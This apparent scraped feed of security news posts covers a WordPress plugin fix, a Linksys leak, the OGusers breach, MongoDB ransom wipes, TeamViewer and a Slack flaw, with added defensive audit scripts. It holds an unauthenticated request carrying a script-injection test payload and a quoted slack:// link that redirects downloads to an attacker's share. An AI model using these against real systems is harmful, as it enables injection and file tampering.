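To check a site after patching, send an unauthenticated request such as `curl -s -o /dev/null -w '%{http_code}' -d 'wplc_custom_js=alert(1)' https://example.com/wp-admin/admin-post.php` (example.com standing in for the site) and then run `wp option get wplc_custom_js` with WP-CLI: with the hardened code the option is untouched, whereas with the vulnerable pattern the request is accepted and the option now holds the payload. Note that the nonce alone would not have fixed the bug: a nonce only proves the request came from a form the site itself rendered, so the capability check is the part that actually stops anonymous writes.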



The post Hackers Inject Scripts in WordPress Live Chat Plugin appeared first on .

Dozens of Linksys router models leak data useful for hackers

Dozens of Linksys router models are affected by a flaw that leaks data useful to attackers, and the company won’t fix it.

Security researcher Troy Mursch, Chief Research Officer of Bad Packets, discovered that over 20,000 Linksys wireless routers are leaking full historical records of every device ever connected to them.

The leaked information includes devices’ unique identifiers (MAC addresses), names, and operating systems; clearly, this data could be abused by attackers.

According to Mursch, the root cause of the data leak is a persistent vulnerability that resides in dozens of Linksys router models. Unfortunately, the flaw is very easy to exploit.

The devices continue to leak the information even when their firewall is turned on.

The expert used the BinaryEdge IoT search engine to find vulnerable devices; earlier this week he discovered 25,617 routers that were leaking a total of 756,565 unique MAC addresses.

The disclosure of historical records of the devices that have connected to a specific router exposes its users to attacks; knowledge of MAC addresses could be abused by APT groups in targeted attacks, as in the recent supply chain attack against ASUS, whose payload activated only on machines with specific MAC addresses.

The situation could be worse if the router owners were still using default admin credentials. The issue discovered by the expert can, in fact, be used by attackers to determine whether a vulnerable router is still using the default administrative password.

Mursch discovered that about 4,000 of the vulnerable devices were still using the default admin credentials. The vulnerable routers have remote access enabled by default, a gift for attackers, who can perform a broad range of malicious activities such as changing DNS settings and delivering malware.

Mursch reported the flaw to Linksys, but unfortunately, the company closed the issue as “Not applicable / Won’t fix.”

Mursch published the list of vulnerable models on Pastebin.


If you are using one of the vulnerable devices you should replace it; at a minimum, change the default administrative password and disable remote management.



Pierluigi Paganini

(SecurityAffairs – LinkSys, Data leak)

The post Dozens of Linksys router models leak data useful for hackers appeared first on Security Affairs.

Breaches and Bugs: How Secure are Your Family’s Favorite Apps?


Is your family feeling more vulnerable online lately? If so, you aren’t alone. The recent WhatsApp bug and a string of social media breaches have app users thinking twice about security.

Hackers behind the recent WhatsApp malware attack reportedly could record conversations, steal private messages, grab photos and location data, and turn on a device’s camera and microphone. (Is anyone else feeling like you just got caught in the middle of an episode of Homeland?)

There’s not much you and your family can do about an attack like this except to stay on top of the news, be sure to share knowledge and react promptly, and discuss device security in your home as much as possible.

How much does your family love its apps? Here’s some insight:

  • Facebook Messenger 3.408 billion downloads
  • WhatsApp 2.979 billion downloads
  • Instagram 1.843 billion downloads
  • Skype 1.039 billion downloads
  • Twitter 833.858 million downloads
  • Candy Crush 805.826 million downloads
  • Snapchat 782.837 million downloads

So, should you require your family to delete its favorite apps? Not even. A certain degree of vulnerability comes with the territory of a digital culture.

However, what you can and should do to ease that sense of vulnerability is to adopt proactive safety habits — and teach your kids — to layer up safeguards wherever possible.

Tips to Help Your Family Avoid Being Hacked

Don’t be complacent. Talk to your kids about digital responsibility and to treat each app like a potential doorway that could expose your family’s data. Take the time to sit down and teach kids how to lock down privacy settings and the importance of keeping device software updated. Counsel them not to accept data breaches as a regular part of digital life and how to fight back against online criminals with a security mindset.

Power up your passwords. Teach your kids to use unique, complex passwords for all of their apps and to use multi-factor authentication when it’s offered.

Auto update all apps. App developers regularly issue updates to fix security vulnerabilities. You can turn on auto updates in your device’s Settings.

Add extra security. If you can add a robust, easy-to-install layer of security to protect your family’s devices, why not? McAfee mobile solutions are available for both iOS and Android and will help safeguard devices from cyber threats.

Avoid suspicious links. Hackers send malicious links through text, messenger, email, pop-ups, or within the context of an ongoing conversation. Teach your kids to be aware of these tricks and not to click suspicious links or download unfamiliar content.

Share responsibly. When you use chat apps like WhatsApp or Facebook Messenger, it’s easy to forget that anyone who gets into your account or device can read your conversations. Remind your children that nothing is guaranteed private, even in messaging apps that feel private. Hackers look for personal information (birthday, address, hometown, or names of family members and pets) to crack your passwords, steal your identity, or gain access to other accounts.

What to Do If You Get Hacked

If one of your apps is compromised, act quickly to minimize the fallout. If you’ve been hacked, you may notice your device running slowly, a drain on your data, strange apps on your home screen, and evidence of calls, texts or emails you did not send.

Social media accounts. For Facebook and other social accounts, change your password immediately and alert your contacts that your account was compromised.

Review your purchase history. Check to see if there are any new apps or games installed that you didn’t authorize. You may have to cancel the credit card associated with your Google Play or iTunes account.

Revoke app access, delete old apps. Sometimes it’s not a person but a malicious app you may have downloaded that is wreaking havoc on your device. Encourage your kids to go through their apps and delete suspicious ones as well as apps they don’t use.

Bugs and breaches are part of our digital culture, but we don’t have to resign ourselves to being targets. By sharing knowledge and teaching kids to put on a security mindset, together, you can stay one step ahead of a cybercrook’s digital traps.

The post Breaches and Bugs: How Secure are Your Family’s Favorite Apps? appeared first on McAfee Blogs.

Account Hijacking Forum OGusers Hacked

Ogusers[.]com — a forum popular among people involved in hijacking online accounts and conducting SIM swapping attacks to seize control over victims’ phone numbers — has itself been hacked, exposing the email addresses, hashed passwords, IP addresses and private messages for nearly 113,000 forum users.

On May 12, the administrator of OGusers explained an outage to forum members by saying a hard drive failure had erased several months’ worth of private messages, forum posts and prestige points, and that he’d restored a backup from January 2019. Little did the administrators of OGusers know at the time, but that May 12 incident coincided with the theft of the forum’s user database, and the wiping of forum hard drives.

On May 16, the administrator of rival hacking community RaidForums announced he’d uploaded the OGusers database, containing the passwords, email addresses, IP addresses and private messages of more than 113,000 Ogusers[.]com users, for anyone to download for free.

“On the 12th of May 2019 the forum was breached [and] 112,988 users were affected,” the message from RaidForums administrator Omnipotent reads. “I have uploaded the data from this database breach along with their website source files. Their hashing algorithm was the default salted MD5 which surprised me, anyway the website owner has acknowledged data corruption but not a breach so I guess I’m the first to tell you the truth. According to his statement he didn’t have any recent backups so I guess I will provide one on this thread lmfao.”

The database, a copy of which was obtained by KrebsOnSecurity, appears to hold the usernames, email addresses, hashed passwords, private messages and IP address at the time of registration for approximately 113,000 users (although many of these nicknames are likely the same people using different aliases).

The publication of the OGuser database has caused much consternation and drama for many in the community, which has become infamous for attracting people involved in hijacking phone numbers as a method of taking over the victim’s social media, email and financial accounts, and then reselling that access for hundreds or thousands of dollars to others on the forum.

Several threads on OGusers quickly were filled with responses from anxious users concerned about being exposed by the breach. Some complained they were already receiving phishing emails targeting their OGusers accounts and email addresses. 

Meanwhile, the official Discord chat channel for OGusers has been flooded with complaints and expressions of disbelief at the hack. Members vented their anger at the main forum administrator, who uses the nickname “Ace,” claiming he altered the forum functionality after the hack to prevent users from removing their accounts. One user on the Discord chat summed it up:

“Ace be like:

- not replace broken hard drives, causing the site to time warp back four months
- not secure website, causing user info to be leaked
- disable selfban so people can’t leave”

It’s difficult not to admit feeling a bit of schadenfreude in response to this event. It’s gratifying to see such a comeuppance for a community that has largely specialized in hacking others. Also, federal and state law enforcement investigators going after SIM swappers are likely to have a field day with this database, and my guess is this leak will fuel even more arrests and charges for those involved.

Simple Mitigation Tips For Securing Android E-Readers

Android e-readers do not grab headlines when manufacturers announce their products. However, e-ink based Android tablets still sell well, given that they provide more flexibility than similarly priced Amazon Kindle e-readers. Like the Kindle, whatever book you open, the text is rendered by default on a sepia background that mimics aged paper. Under the settings menu you can pick other backgrounds such as wood, leather or solid colors. Reading on a white background is tiring for some, and Android e-readers let users change a book’s background to whatever color they prefer. Users can change not only the background but also the color of text, hyperlinks, and so on.

If users like control over fonts, line spacing, alignment and margins, they will love Android e-readers. There are many options to change all of these, and Android has always had the edge over the Kindle when it comes to customization. Conveniently, the settings carry over to whatever book the user opens next. Page turns are fast and impressive, and users can read in both landscape and portrait orientation; orientation is locked by default but can be unlocked immediately in the settings menu. The one thing that may annoy users is the page-turning experience: a strange line sweeps the screen each time a page is turned. It is not just a screen refresh; the page feed takes a bit longer than on the Amazon Kindle. As users turn pages with taps or swipes, these lines follow and fill the page.

But unlike the Kindle e-readers, which offer basic e-ink reading capability, Android e-readers are full Android tablets with an e-ink screen. That means every vulnerability of a regular Android device also affects the Android e-reader; conversely, the features that keep Android secure, such as the built-in anti-malware service Google Play Protect, are also present on the device. The weak point of Android e-readers is that they are effectively legacy devices: many ship with Android 4.0 Ice Cream Sandwich, and the newest models run Android 6.0 Marshmallow, which was released in 2015.

Android e-readers no longer occupy store shelves and usually can only be bought online. Since Android 4.x and 6.x are old versions that no longer receive patches from Google, a heightened level of security awareness is required to keep using the device safely.

Here are some of our recommendations:

Only associate your Google Account when you need the Google Play Store
The Google Account does not need to stay saved on the device. Add it only when a new app has to be downloaded from the Play Store, then remove it again. That preserves the security and privacy of the Google Account if the e-reader picks up malware: on an infected Android device, the associated Google Account is at risk of being used for nefarious purposes. So do not keep the account on the device when there are no new apps to install.

Turn off Bluetooth when it is not in use
Keeping the device isolated, with Bluetooth off, means a third party has no way to push files to the e-reader over that channel.

Only use legitimate apps (never sideload)
Apps should only be downloaded from the official source, the Google Play Store. That way the app has gone through Google Play's review and Google Play Protect scans it before installation; an APK sideloaded from a random website has had neither.

Consider whether a full Android tablet or phone would be a better choice
Evaluate whether you really need to keep using the e-reader: it runs a very old Android version that is not considered safe for daily use while connected to the Internet. Replace the device with a current tablet or phone; if you keep it, use it offline rather than leaving it exposed to the public Internet.
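The four recommendations above can be checked from a workstation over adb. The script below is an added example, not code from the article: it reads the platform version, the security patch level, the "Unknown sources" and Bluetooth settings and the attached accounts, and prints a finding for each point that is out of line. The MIN_SDK and PATCH_CUTOFF thresholds are this script's own assumptions, and all sample dumps are constructed so it can run without a device.

```shell
#!/bin/sh
# Added example (not from the article): audit an old Android e-reader over adb
# against the four points above. Run `sh ereader_audit.sh live` with the device
# attached and USB debugging enabled, or with no argument to run on the
# constructed sample dumps below. MIN_SDK and PATCH_CUTOFF are assumptions.

MIN_SDK=24                # assumption: API 23 (Android 6.0) and below are treated as out of support
PATCH_CUTOFF=2019-01-01   # assumption: a security patch level before this date counts as stale

# Constructed sample of `adb shell getprop` output for an e-reader (illustrative values)
SAMPLE_PROPS='[ro.build.version.release]: [6.0.1]
[ro.build.version.sdk]: [23]
[ro.build.version.security_patch]: [2017-08-05]
[ro.product.model]: [ereader]'

# Constructed sample of the `adb shell settings get <namespace> <key>` answers, one per line
SAMPLE_SETTINGS='secure install_non_market_apps 1
global bluetooth_on 1'

# Constructed sample of `adb shell dumpsys account` (the address is made up)
SAMPLE_ACCOUNTS='Accounts: 1
  Account {name=reader@example.com, type=com.google}'

# prop_value DUMP NAME: value of NAME from a getprop-style dump
prop_value() {
    printf '%s\n' "$1" | sed -n "s/^\[$2\]: \[\(.*\)\]$/\1/p"
}

# setting_value DUMP NAMESPACE KEY: value from the settings dump
setting_value() {
    printf '%s\n' "$1" | awk -v ns="$2" -v key="$3" '$1 == ns && $2 == key { print $3 }'
}

# google_account_present DUMP: succeed if a Google account is still attached
google_account_present() {
    printf '%s\n' "$1" | grep -q 'type=com.google'
}

# sdk_out_of_support SDK: succeed if the API level is below MIN_SDK
sdk_out_of_support() {
    [ "${1:-0}" -lt "$MIN_SDK" ]
}

# patch_is_stale YYYY-MM-DD: succeed if the patch level sorts before PATCH_CUTOFF
# (ISO dates compare correctly as strings, so date(1) is not needed)
patch_is_stale() {
    expr "$1" \< "$PATCH_CUTOFF" > /dev/null
}

# collect_*: live data from adb when "live" is requested, otherwise the samples
collect_props() {
    if [ "$1" = live ]; then adb shell getprop | tr -d '\r'; else printf '%s\n' "$SAMPLE_PROPS"; fi
}
collect_settings() {
    if [ "$1" = live ]; then
        printf 'secure install_non_market_apps %s\n' "$(adb shell settings get secure install_non_market_apps | tr -d '\r')"
        printf 'global bluetooth_on %s\n' "$(adb shell settings get global bluetooth_on | tr -d '\r')"
    else
        printf '%s\n' "$SAMPLE_SETTINGS"
    fi
}
collect_accounts() {
    if [ "$1" = live ]; then adb shell dumpsys account | tr -d '\r'; else printf '%s\n' "$SAMPLE_ACCOUNTS"; fi
}

# audit PROPS SETTINGS ACCOUNTS: print one finding per line (nothing printed = clean)
audit() {
    sdk=$(prop_value "$1" ro.build.version.sdk)
    release=$(prop_value "$1" ro.build.version.release)
    patch=$(prop_value "$1" ro.build.version.security_patch)
    if sdk_out_of_support "$sdk"; then
        echo "OUT_OF_SUPPORT: Android $release (API $sdk) gets no more platform patches; keep it offline or replace it"
    fi
    if [ -z "$patch" ] || patch_is_stale "$patch"; then
        echo "STALE_PATCH: security patch level '${patch:-none}' is older than $PATCH_CUTOFF"
    fi
    if [ "$(setting_value "$2" secure install_non_market_apps)" = 1 ]; then
        echo "SIDELOAD_ENABLED: 'Unknown sources' is on; turn it off and install from the Play Store only"
    fi
    if [ "$(setting_value "$2" global bluetooth_on)" = 1 ]; then
        echo "BLUETOOTH_ON: Bluetooth is enabled; turn it off when not in use"
    fi
    if google_account_present "$3"; then
        echo "GOOGLE_ACCOUNT_ATTACHED: remove the account until the next Play Store install"
    fi
}

# Stand-alone run: offline on the samples, or `live` against an attached device
audit "$(collect_props "$1")" "$(collect_settings "$1")" "$(collect_accounts "$1")"
```

The `install_non_market_apps` secure setting and the `bluetooth_on` global setting are the ones the Android 4.x to 6.x builds these readers ship with expose through `settings get`; newer Android versions moved the sideloading switch to a per-app permission, so the script would need adjusting there.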

Also, Read:

7 Android Security Features You Never Knew You Needed

Nexus and Pixel devices now has Google’s Android Security Patch

Fortnite’s Accidental Revelation of Android’s Security Weakness

Google Launches Play Protect for Android Device Security

The 6 Deadly Mobile Security Threats

The post Simple Mitigation Tips For Securing Android E-Readers appeared first on .

Unistellar attackers already wiped over 12,000 MongoDB databases

Unistellar attackers have already wiped roughly 12,000 unsecured MongoDB databases exposed online over the past three.

Every time hackers deleted a MongoDB database they left a message asking the administrators to contact them to restore the data.

Unfortunately, the criminal practice of deleting MongoDB databases and demanding a ransom to restore the data is common; experts have observed several campaigns targeting unsecured instances exposed online.

In this latest wave of attacks, the crooks do not demand a specific ransom amount; instead, they provide an email contact to start a negotiation.

Bleeping Computer first reported the attacks and cited the researcher Sanyam Jain as the person who discovered the wiped MongoDB databases.

“This person might be charging money in cryptocurrency according to the sensitiveness of the database,” explained Jain.

The researcher found 12,564 unprotected MongoDB instances that had been wiped by an attacker tracked as Unistellar; he searched for the string “hacked_by_unistellar” that the attacker leaves in the message.

Running the same search on Shodan, experts at BleepingComputer found a smaller number, 7,656 databases, while doing the same search I found 8,133 compromised installs exposed online.
It is likely the attacker has automated the attack chain, given the large number of MongoDB databases deleted by Unistellar.

Unistellar MongoDB wiped

Jain first discovered the attacks on April 24; the note left by the Unistellar attacker reads “Restore ? Contact :

The attacker used two email addresses in these attacks, or

According to Jain, Unistellar creates restore points to restore the databases after the victims have paid the ransom.

If you manage a MongoDB instance, follow the guidelines on “how to secure a MongoDB database”. The instances hit by Unistellar were reachable from the Internet and accepted unauthenticated connections; the two settings that fix that are binding mongod to a non-public interface and enabling authorization.
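The block below is an added example, not from the article or the MongoDB project: the kind of mongod.conf the wiped instances typically ran next to a hardened one, the bootstrap commands for the first admin user, and a small check that can run in CI against your own file. The 10.0.0.5 address, the admin user name and the host name db.example.internal are placeholders.

```shell
#!/bin/sh
# Added example (not from the article or the MongoDB project): a hardened
# mongod.conf next to the configuration that gets an instance wiped, plus a
# check for the two settings that matter. The private address, user name and
# host name are placeholders (assumptions).

# Typical exposed instance: listening on every interface, no access control.
WEAK_CONF='storage:
  dbPath: /var/lib/mongodb
net:
  port: 27017
  bindIp: 0.0.0.0'

# Hardened: loopback plus one private interface, and authorization required.
# Put a firewall or VPN in front as well; bindIp alone is not a perimeter.
HARDENED_CONF='storage:
  dbPath: /var/lib/mongodb
net:
  port: 27017
  bindIp: 127.0.0.1,10.0.0.5
security:
  authorization: enabled'

# Bootstrap order: start mongod with the hardened file, create the first admin
# from the server itself over the localhost exception, then confirm that a
# remote unauthenticated client is refused:
#   mongo admin --eval 'db.createUser({user: "admin", pwd: passwordPrompt(), roles: ["userAdminAnyDatabase"]})'
#     (passwordPrompt() needs mongo shell 4.2+; older shells take a literal pwd string)
#   mongo --host db.example.internal --eval 'db.adminCommand({listDatabases: 1})'   # expect "not authorized"

# check_mongod_conf: read a mongod.conf on stdin, print each problem, succeed only if none
check_mongod_conf() {
    conf=$(cat)
    problems=0
    bind=$(printf '%s\n' "$conf" | sed -n 's/^ *bindIp: *\([^ #]*\).*/\1/p' | head -n1)
    if [ -z "$bind" ]; then
        echo "net.bindIp not set: mongod before 3.6 listens on all interfaces by default"
        problems=$((problems + 1))
    fi
    case ",$bind," in
        *,0.0.0.0,*|*,::,*)
            echo "net.bindIp contains a wildcard address ($bind): reachable from the public Internet"
            problems=$((problems + 1)) ;;
    esac
    if printf '%s\n' "$conf" | grep -q '^ *bindIpAll: *true'; then
        echo "net.bindIpAll is true: every interface is exposed"
        problems=$((problems + 1))
    fi
    if ! printf '%s\n' "$conf" | grep -q '^ *authorization: *enabled'; then
        echo "security.authorization is not enabled: anyone who reaches the port can read, drop and replace every database"
        problems=$((problems + 1))
    fi
    [ "$problems" -eq 0 ]
}

# Stand-alone run: the weak file fails, the hardened one passes.
# For a real file:  check_mongod_conf < /etc/mongod.conf
echo "weak config:";     printf '%s\n' "$WEAK_CONF" | check_mongod_conf || true
echo "hardened config:"; printf '%s\n' "$HARDENED_CONF" | check_mongod_conf && echo "no problems found"
```

The check is deliberately a line-oriented one so it runs on any host without a YAML parser; it catches the two misconfigurations behind this campaign, not every possible mistake in a mongod.conf.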

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – Unistellar attacks, MongoDB)

The post Unistellar attackers already wiped over 12,000 MongoDB databases appeared first on Security Affairs.

Facebook banned Archimedes Group, misinformation made in Israel

A new political misinformation campaign was uncovered and blocked by Facebook; this time it was not operated by Russia but by Israel’s Archimedes Group

Facebook uncovered and blocked a misinformation campaign run by Israel’s Archimedes Group, a corporation that used fake accounts to manipulate political debate.

According to Facebook, the Archimedes Group used hundreds of pages, accounts and groups in an attempt to influence public sentiment in political discussions.

The misinformation focused on specific countries in Africa (Nigeria, Senegal, Togo, Angola, Niger and Tunisia), Latin America and Southeast Asia. The operators behind the campaign posed as local people and organizations to fuel the debate on specific political events.

“Today we removed 265 Facebook and Instagram accounts, Facebook Pages, Groups and events involved in coordinated inauthentic behavior. This activity originated in Israel and focused on Nigeria, Senegal, Togo, Angola, Niger and Tunisia along with some activity in Latin America and Southeast Asia.” wrote Nathaniel Gleicher, Head of cybersecurity Policy at Facebook. “The people behind this network used fake accounts to run Pages, disseminate their content and artificially increase engagement.”

Facebook banned Archimedes Group and all of its subsidiaries from its social media platforms.

Facebook shared some interesting details about the corporation’s efforts to spread fake news and reshape perceptions of reality:

  • Presence on Facebook and Instagram: 65 Facebook accounts, 161 Pages, 23 Groups, 12 events and four Instagram accounts.
  • Followers: About 2.8 million accounts followed one or more of these Pages, about 5,500 accounts joined at least one of these Groups and around 920 people followed one or more of these Instagram accounts.
  • Advertising: Around $812,000 in spending for ads on Facebook paid for in Brazilian reals, Israeli shekel, and US dollars. The first ad ran in December 2012 and the most recent ad ran in April 2019.
  • Events: Nine events were hosted by these Pages. The first was scheduled for October 2017 and the most recent was scheduled for May 2019. Up to 2,900 people expressed interest in at least one of these events, and a portion of their accounts were previously identified and disabled as fake. We cannot confirm whether any of these events actually occurred.

Facebook provided an example of the type of content that was removed; the image it shared relates to Martin Fayulu, leader of the Engagement for Citizenship and Development party in the Democratic Republic of the Congo.


Archimedes Group spent a total of $812,000 on Facebook ads, a figure that gives an idea of the strategic importance of social networks in misinformation campaigns.

“It has repeatedly violated our misrepresentation and other policies, including by engaging in coordinated inauthentic behavior,” Facebook says. “This organization and all its subsidiaries are now banned from Facebook, and it has been issued a cease and desist letter.”

Now the question is: who paid for this campaign?

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

I’m one of the finalists thanks to your support

Thank you


Pierluigi Paganini

(SecurityAffairs – Facebook, Archimedes Group)

The post Facebook banned Archimedes Group, misinformation made in Israel appeared first on Security Affairs.

Our Long Collective Struggle To Secure Enterprise Email

Email is the oldest service on the Internet. Launched in the early 1970s, it predates the World Wide Web by roughly two decades. Yet the fundamentals of sending and receiving email have not changed; all the weaknesses of the email systems of the 70s are still with us today. In 1978 the first spam email was sent, to several hundred ARPANET users. Other threats delivered through email, such as malware and phishing, followed soon after.

These threats take advantage of the basic foundation of email: accessibility and an open-ended approach to transferring information. Security was never part of the foundation when email was first conceived by the fathers of the Internet. It grew out of the same research network that gave us TCP/IP (Transmission Control Protocol/Internet Protocol), built so that scientists could share the results of their experiments and research with one another.

When email and the rest of the Internet became a “public sphere” rather than a military and research network, opportunists found a new home in exploiting its weaknesses at the expense of unsuspecting users. The number of cyber attacks targeting countries and companies keeps rising, and information security is now a matter of survival for companies. At the same time, as business and IT have become intertwined, IT investment is needed everywhere and the budget available for security is limited. Likewise, IT staff are busy with many other tasks, which makes it hard for them to specialize in security.

Under these circumstances, effective use of security solutions is essential to maintain a safe environment that includes business partners and customers. Above all, the key point is how to secure email, which is said to be the initial vector in 80 to 90% of attacks. It goes without saying that among the damage caused by cyber attacks, it is information leakage that is fatal to companies. Targeted attack emails and phishing emails often spoof legitimate senders such as business partners, financial institutions and public organizations. And the reason the damage has kept growing over the last two decades is that both the wording of these emails and the malware they deliver have been refined.

Is there a permanent solution?
The most common email attack methods are malicious attachments, such as ransomware droppers, and links that redirect the reader to a fraudulent site. In the latter case, clicking the URL in the mail sends you to a look-alike or compromised website, which then tries to push malware onto your machine. And be aware that in such email-based attacks, plain spam, which was previously thought to cause no direct harm to the system, is increasingly the delivery vehicle.

Spam is advertising email sent indiscriminately to large numbers of recipients. In the past, the damage caused by spam was that floods of unwanted mail interfered with business operations, and the effort of deleting it was a constant cost. Recently, however, in addition to this, spam has become a trigger for malware infection or is used for phishing scams. There are also more cases where the botnets that send large-scale spam are the source of ransomware.

Beyond the technical controls, the remaining defense is for users to develop a healthy sense of doubt when receiving email. A reasonable level of suspicion does not hurt; in fact, it is even safer to call the sender to verify that they actually sent the message. No system can prevent 100% of email risks, but there will always be a human standing in the way. The point at which a network gets infected or a company falls for spear phishing is the human user representing the company. All employees are the front line of a corporate IT security arrangement.
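Before anyone picks up the phone to verify a sender, the headers already say a lot. The script below is an added example, not from the article: it pulls the visible From domain, the envelope sender (Return-Path), the Reply-To domain and the SPF/DKIM/DMARC verdicts that your own receiving server wrote into Authentication-Results, and prints an indicator for each sign of sender spoofing the text describes. The header block and every name, address and host in it are constructed for the demo; the script assumes your MX adds an Authentication-Results header, which most do.

```shell
#!/bin/sh
# Added example (not from the article): first-pass triage of a suspicious
# message's headers. Flags a visible From domain that does not match the
# envelope sender or the Reply-To, and any SPF/DKIM/DMARC failure your own
# MX recorded. All names and addresses below are constructed.
#   usage: sh mail_triage.sh message.eml     (no argument runs the sample)

# Constructed header block of a phishing mail impersonating "bank.example"
SAMPLE_HEADERS='Return-Path: <bounce-8831@mail-relay.example.net>
Received: from mail-relay.example.net (203.0.113.10) by mx.corp.example (10.0.0.1)
Authentication-Results: mx.corp.example; spf=pass smtp.mailfrom=mail-relay.example.net; dkim=none; dmarc=fail header.from=bank.example
From: "Bank Support" <support@bank.example>
Reply-To: Bank Support <support-desk@bank-verify.example>
To: <jane.doe@corp.example>
Subject: Urgent: verify your account today'

# header_value HEADERS NAME: first value of the named header (case-insensitive).
# Folded continuation lines are not joined; unfold them first for a real .eml if needed.
header_value() {
    printf '%s\n' "$1" | grep -i "^$2:" | head -n1 | sed 's/^[^:]*: *//'
}

# addr_domain TEXT: lower-cased domain of the first mailbox in TEXT ("" if none)
addr_domain() {
    printf '%s\n' "$1" | sed -n 's/.*@\([A-Za-z0-9.-]*\).*/\1/p' | head -n1 | tr 'A-Z' 'a-z'
}

# auth_result HEADERS METHOD: result the MX recorded for spf, dkim or dmarc ("" if absent)
auth_result() {
    header_value "$1" Authentication-Results | sed -n "s/.*[; ]$2=\([A-Za-z]*\).*/\1/p" | tr 'A-Z' 'a-z'
}

# triage HEADERS: print one indicator per line; nothing printed means nothing obvious
triage() {
    from_dom=$(addr_domain "$(header_value "$1" From)")
    rp_dom=$(addr_domain "$(header_value "$1" Return-Path)")
    reply_dom=$(addr_domain "$(header_value "$1" Reply-To)")
    if [ -n "$rp_dom" ] && [ "$rp_dom" != "$from_dom" ]; then
        echo "ENVELOPE_MISMATCH: bounces go to $rp_dom but the visible sender is $from_dom (normal for bulk senders, odd for a bank)"
    fi
    if [ -n "$reply_dom" ] && [ "$reply_dom" != "$from_dom" ]; then
        echo "REPLYTO_MISMATCH: replies are diverted to $reply_dom instead of $from_dom"
    fi
    for method in spf dkim dmarc; do
        result=$(auth_result "$1" $method)
        case $result in
            fail|softfail|permerror|temperror)
                echo "AUTH_${method}_FAIL: $method=$result recorded by the MX for mail claiming to be from $from_dom" ;;
        esac
    done
}

# Stand-alone run: a saved .eml (headers end at the first blank line) or the sample
if [ -n "$1" ]; then
    triage "$(tr -d '\r' < "$1" | sed '/^$/q')"
else
    triage "$SAMPLE_HEADERS"
fi
```

None of these indicators alone proves a spoof (mailing-list software legitimately rewrites Return-Path, for instance), but a DMARC failure on a domain that publishes a reject policy, combined with a Reply-To pointing somewhere else, is exactly the pattern the paragraph above describes, and a good reason to make that phone call.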

Also, Read:

Avoid These Mistakes, Ensure Better Enterprise Security

Is It Possible To Have Email Security Without OpenPGP/S-MIME?

Mimecast Quarterly Report: 25% Of Spam and Malicious Emails Bypass Security Systems

How Enterprises Can Combat Cybersecurity Challenges On The Cloud

Can Artificial Intelligence Boost Future Email Security?

The post Our Long Collective Struggle To Secure Enterprise Email appeared first on .

Israeli firm linked to WhatsApp spyware attack faces lawsuit

Amnesty International fears its staff may be ‘surveilled via NSO Pegasus software’

The Israeli firm linked to this week’s WhatsApp hack is facing a lawsuit backed by Amnesty International, which says it fears its staff may be under surveillance from spyware installed via the messaging service.

Related: WhatsApp urges users to update app after discovering spyware vulnerability

Related: WhatsApp spyware attack was attempt to hack human rights data, says lawyer

Related: WhatsApp hack: have I been affected and what should I do?

Continue reading...

Chinese state-sponsored hackers breached TeamViewer in 2016

The German newspaper Der Spiegel revealed that the software company behind TeamViewer was compromised in 2016 by Chinese hackers.

China-linked hackers breached the German software company behind TeamViewer in 2016, the German newspaper Der Spiegel reported.


According to the media outlet, Chinese state-sponsored hackers used the Winnti trojan to infect the company’s systems.

The Winnti group was first documented by Kaspersky in 2013; according to its researchers the gang has been active since 2007.

The group has carried out both financially motivated attacks and cyber espionage campaigns. It was originally known for targeting companies in the online gaming industry, with most of its victims located in Southeast Asia.

The Winnti cyberespionage group is known for its ability in targeting supply chains of legitimate software to spread malware.

According to the company, it was targeted in autumn 2016; its experts detected the suspicious activity and quickly blocked it to prevent major damage.

A TeamViewer spokesperson said the company investigated the intrusion attempt but found no evidence that customer data or other sensitive data had been exposed.

Der Spiegel pointed out that TeamViewer did not disclose the security breach to the public.

“In autumn 2016, TeamViewer was target of a cyber-attack. Our systems detected the suspicious activities in time to prevent any major damage. An expert team of internal and external cyber security researchers, working together closely with the responsible authorities, successfully fended off the attack and with all available means of IT forensics found no evidence that customer data or other sensitive information had been stolen, that customer computer systems had been infected or that the TeamViewer source code had been manipulated, stolen or misused in any other way.” said company spokesman.

“Out of an abundance of caution, TeamViewer conducted a comprehensive audit of its security architecture and IT infrastructure subsequently and further strengthened it with appropriate measures.”

Earlier in 2016, the company had published a statement denying that it had been breached, after reports that TeamViewer users had their bank accounts emptied:

Göppingen/Germany, May 23, 2016. A recent article warns, “TeamViewer users have had their bank accounts emptied by hackers gaining full-system access”. TeamViewer is appalled by any criminal activity; however, the source of the problem, according to our research, is careless use, not a potential security breach on TeamViewer’s side.” wrote the company.

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

I’m one of the finalists thanks to your support

Thank you


Pierluigi Paganini

(SecurityAffairs – TeamViewer, hacking)

The post Chinese state-sponsored hackers breached TeamViewer in 2016 appeared first on Security Affairs.

A flaw in Slack could allow hackers to steal, manipulate downloaded files

A recently patched flaw in the Slack desktop application for Windows can be exploited by attackers to steal and manipulate a targeted user’s downloaded files.

Slack is a cloud-based set of proprietary team collaboration tools and services.

Security researcher David Wells of Tenable discovered a flaw in version 3.3.7 of the Slack desktop app for Windows that could be exploited to steal and manipulate a targeted user’s downloaded files.

The issue is classified as a download hijacking vulnerability that can be triggered by tricking a user into clicking on a specially crafted link pasted into a Slack channel.

Slack addressed the flaw with the release of version 3.4.0.

Wells discovered that slack:// links, when clicked, can change Slack app settings, including the PrefSSBFileDownloadPath setting that specifies where a user’s files are downloaded. An attacker could craft a link that, when clicked, changes the target’s download destination to a path of the attacker’s choosing, for example a remote SMB share.

“Crafting a link like “slack://settings/?update={‘PrefSSBFileDownloadPath’:’<pathHere>’}” would change the default download location if clicked (until manually changed back).” reads a blog post published by the expert. “The links however, cannot contain certain characters, as Slack filters them out. One of these characters is the “:” (colon) which means we can’t actually supply a path with drive root. An SMB share, however, completely bypassed this sanitation as there is no root drive needed.”

Slack download

Wells also found that an attacker can tamper with the files downloaded to a location they control.

“Furthermore, we could have easily manipulated the download item when we control the share it’s uploaded to, meaning the Slack user that opens/executes the downloaded file will actually instead be interacting with our modified document/script/etc off the remote SMB share, the options from there on are endless.”

An attacker could, for example, inject malware into an Office document the victim downloads.

The links can be pasted into a Slack channel or private conversation to which the attacker has access.

But can the link reach Slack channels the attacker is not a member of?

The expert found that an unauthenticated attacker can also change the download location via RSS feeds: Slack channels can subscribe to RSS feeds to populate the channel with site updates, and those updates can contain links.

